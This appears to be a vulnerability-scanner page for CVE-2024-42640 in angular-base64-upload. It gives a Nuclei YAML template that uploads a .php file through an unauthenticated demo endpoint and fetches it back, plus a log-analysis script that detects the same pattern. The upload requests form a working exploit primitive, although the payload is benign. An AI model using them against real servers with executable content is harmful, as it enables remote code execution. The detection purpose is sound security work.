Angular-Base64-Upload - Remote Code Execution
ID: CVE-2024-42640
Severity: critical
Author: s4e-io
Tags: cve,cve2024,angular,rce
Description
angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
YAML Source
id: CVE-2024-42640

info:
  name: Angular-Base64-Upload - Remote Code Execution
  author: s4e-io
  severity: critical
  description: |
    angular-base64-upload prior to v0.1.21 is vulnerable to unauthenticated remote code execution via demo/server.php. Exploiting this vulnerability allows an attacker to upload arbitrary content to the server, which can subsequently be accessed through demo/uploads. This leads to the execution of previously uploaded content and enables the attacker to achieve code execution on the server. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
  reference:
    - https://github.com/rvizx/CVE-2024-42640
    - https://www.zyenra.com/blog/unauthenticated-rce-in-angular-base64-upload.html
    - https://github.com/adonespitogo/angular-base64-upload
    - https://nvd.nist.gov/vuln/detail/CVE-2024-42640
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H
    cvss-score: 10
    cve-id: CVE-2024-42640
    cwe-id: CWE-94
    epss-score: 0.00043
    epss-percentile: 0.09695
  metadata:
    max-request: 4
  tags: cve,cve2024,angular,rce

variables:
  filename: "{{to_lower(rand_text_alpha(12))}}"
  num: "{{rand_int(1000000,9999999)}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}

      - |
        POST /bower_components/angular-base64-upload/demo/server.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"base64": "{{base64(num)}}", "filename": "{{filename}}.php"}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_1,"uploads/{{filename}}.php") || contains(body_2,"uploads/{{filename}}.php") '
          - 'status_code_1 == 200 || status_code_2 == 200'
        condition: and
        internal: true

  - raw:
      - |
        GET /node_modules/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

      - |
        GET /bower_components/angular-base64-upload/demo/uploads/{{filename}}.php HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains(body_3, "{{num}}") || contains(body_4, "{{num}}")'
          - 'status_code_3 == 200 || status_code_4 == 200'
        condition: and
# digest: 4a0a00473045022100d6147d40c50269d04a06ca3a6f1082d41307d34331cd141f78e769ac536b3751022021058b90109b4b2f905f5a20fa02eda12586b5454b8ac138ff2fdaca86a21d0d:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities
This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-42640.yaml"
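
The same request pattern (a POST to demo/server.php, then a request for a .php file under demo/uploads) can also be looked for in a web server's access logs. The script below is an added example, not part of the template or the nuclei project; it assumes the Apache/nginx "combined" log format, and the function name and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths from the template: the package's demo directory, reachable when
# node_modules/ or bower_components/ is served from the web root.
BASE = r"/(?:node_modules|bower_components)/angular-base64-upload/demo"
UPLOAD_RE = re.compile(BASE + r"/server\.php$", re.I)
# Only .php is matched, as in the template; add other extensions if the
# server maps them to the PHP handler.
FETCH_RE = re.compile(BASE + r"/uploads/([^/]+\.php)$", re.I)
# Assumption: Apache/nginx "combined" access log format.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def find_upload_then_fetch(lines):
    """Flag requests for .php files under demo/uploads, noting whether the
    same client had a successful POST to demo/server.php earlier in the log."""
    uploaders = set()
    findings = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # not in the assumed format
        client, method, target, status = m[1], m[2], m[3], int(m[4])
        path = unquote(target.split("?", 1)[0])  # drop query, decode %xx
        if method == "POST" and UPLOAD_RE.search(path) and 200 <= status < 300:
            uploaders.add(client)
            continue
        hit = FETCH_RE.search(path)
        if hit:
            findings.append({"client": client, "file": hit[1], "status": status,
                             "preceded_by_upload": client in uploaders})
    return findings

# Constructed sample lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2025:10:00:00 +0000] "POST /node_modules/angular-base64-upload/demo/server.php HTTP/1.1" 200 64 "-" "-"',
    '203.0.113.7 - - [01/Jan/2025:10:00:01 +0000] "GET /node_modules/angular-base64-upload/demo/uploads/abcdefghijkl.php HTTP/1.1" 200 7 "-" "-"',
    '198.51.100.9 - - [01/Jan/2025:10:05:00 +0000] "GET /bower_components/angular-base64-upload/demo/uploads/x.php?c=1 HTTP/1.1" 404 0 "-" "-"',
    '198.51.100.9 - - [01/Jan/2025:10:06:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "-"',
]

if __name__ == "__main__":
    for finding in find_upload_then_fetch(SAMPLE_LOG):
        print(finding)
```

A finding with status 200 and `preceded_by_upload` set means the uploaded file was served back to the client that wrote it; any hit at all shows the demo directory is exposed and should be removed from the deployed tree.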